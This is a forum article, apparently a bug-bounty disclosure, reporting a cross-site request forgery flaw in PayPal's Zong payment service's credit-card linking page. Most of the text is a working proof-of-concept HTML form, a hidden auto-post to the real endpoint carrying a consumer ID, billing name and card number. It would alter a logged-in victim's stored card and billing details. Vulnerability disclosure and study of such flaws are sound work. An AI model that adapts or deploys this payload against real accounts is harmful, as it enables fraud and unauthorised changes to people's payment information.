• Paypal Zong Service Credit card & Billing Info Update CSRF

    by
    [s]
    Rate this article
    Published on 03-12-2013 04:20 PM      Number of Views: 10755  
    0 Comments Comments
    Vendor product Brief Information : Zong aim Frictionless Mobile Payments to the world. Zong processing millions of payments a month in over 40 countries worldwide.

    CSRF Vulnerable URL : https://my.zong.com/ZPlusConsumerCon...creditCardLink

    CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated(OWASP).

    POC:

    Code:
    <form action="https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink" method="post" name="manageCreditCardForm" id="manageCreditCardForm">
  <input type="hidden" name="consumer_id" value="10053353027" id="consumer_id">
  <input type="hidden" name="is_update" value="false" id="is_update">

        <label for="billing_first_name">First name </label>

        <input type="text" class="text required" id="billing_first_name" name="billing_first_name" value="sandeep">
        <label for="billing_last_name">Last name</label>
        <input type="text" class="text required" id="billing_last_name" name="billing_last_name" value="kamble">
        <label for="billing_card_type">Card type</label>
        <select name="billing_card_type" class="select1" id="billing_card_type">
            <option value="Visa">Visa</option>
            <option value="MasterCard">MasterCard</option>
            <option value="AmericanExpress">American Express</option>
            <option value="Discover">Discover</option>
        </select>
      
        <label for="billing_card_number">Card number</label>
      
        <input type="text" class="text required" id="billing_card_number" name="billing_card_number" value="442411000016">
      
        <label for="billing_exp_month">Expiration date</label>
        <select name="billing_exp_month" class="select2" id="billing_exp_month">
            <option value="-1">Month</option>
            <option value="1">1</option>
            <option value="2">2</option>
            <option value="3">3</option>
            <option value="4">4</option>
            <option value="5">5</option>
            <option value="6">6</option>
            <option value="7">7</option>
            <option value="8">8</option>
            <option value="9">9</option>
            <option value="10">10</option>
            <option value="11">11</option>
            <option value="12">12</option>
        </select>
        <select name="billing_exp_year" class="select2" id="billing_exp_year">
            <option value="-1">Year</option>
            <option value="2013">2013</option>
            <option value="2014">2014</option>
            <option value="2015">2015</option>
            <option value="2016">2016</option>
            <option value="2017">2017</option>
            <option value="2018">2018</option>
            <option value="2019">2019</option>
            <option value="2020">2020</option>
            <option value="2021">2021</option>
            <option value="2022">2022</option>
            <option value="2023">2023</option>
        </select>
      
        <label for="billing_***">Security code</label>
        <input type="text" class="*** required" id="billing_***" maxlength="4" name="billing_***" value="">
         <button type="submit" id="_eventId_continue" name="_eventId_continue" value="continue" class="enterBtn"><span>Link Card</span></button>        
</form>
    Thanks PP for such good bounty Program & PP security Team .
    Special thanks to My G4H Team.


    --[S]
    This article was originally published in forum thread: Paypal service Zong Update Credit Card & Billing Information CSRF started by [s] View original post

  • G4H Facebook

  • G4H Twitter